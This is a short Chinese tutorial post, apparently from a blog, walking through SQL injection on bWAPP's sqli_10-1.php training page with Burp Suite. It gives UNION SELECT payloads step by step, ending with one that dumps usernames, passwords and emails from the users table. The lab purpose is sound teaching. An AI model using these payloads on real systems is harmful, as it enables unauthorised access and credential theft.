SQL註入之bWAPP之sqli_10-1.php
接下來開始註入了。
1、打開burpsuit,在瀏覽器裏搜索框中輸入1,然後提交,抓住數據包。結果如圖:
2、在數據包頭的URI部分輸入“title=1‘”,然後發送,結果如圖:
然後發送到Repeater。
3、判斷是什麽類型註入
先輸入“title=1%‘and‘%‘=‘”,發現返回數據沒有報錯,把“1”換成“i”,發現返回正常數據;因為鋼鐵俠(iron man)有“i”,所以可以正常返回。結果如圖:
4、判斷字段數:
輸入“title=1%‘+order+by+7+--+”,返回正常;輸入“title=1%‘+order+by+8+--+”,返回錯誤;burpsuit的空格需要用“+”表示。結果如下圖:
查看一下,輸入“title=1%‘union+select+1,2,3,4,5,6,7+--+”,結果如圖:
5、查詢數據庫等信息:
輸入“title=1%‘union+select+1,2,3,4,5,6,group_concat(database(),"||",version(),"||",user())+--+”,查詢數據庫名、數據庫版本、當前用戶,結果如圖:
數據庫名為“bwapp”,數據庫版本“5.5.53”,當前用戶“root@localhost”。
6、查詢表名:
輸入“title=1%‘union+select+1,2,3,4,5,6,table_name+from+information_schema.tables+where+table_schema=‘bwapp‘+--+”,發現較重要的表名為users。結果如圖:
7、查詢字段名:
輸入“title=1%‘union+select+1,2,3,4,5,6,column_name+from+information_schema.columns+where+table_name=‘users‘+--+”,發現較重要的字段名有“admin、password、email”,結果如圖:
8、查詢字段內容:
輸入“title=1%‘union+select+1,2,3,4,5,6,group_concat(admin,"||",password,"||",email)+from+users+--+”,結果如圖:
好像講的很簡單,有什麽問題可以一起討論啊。
SQL註入之bWAPP之sqli_10-1.php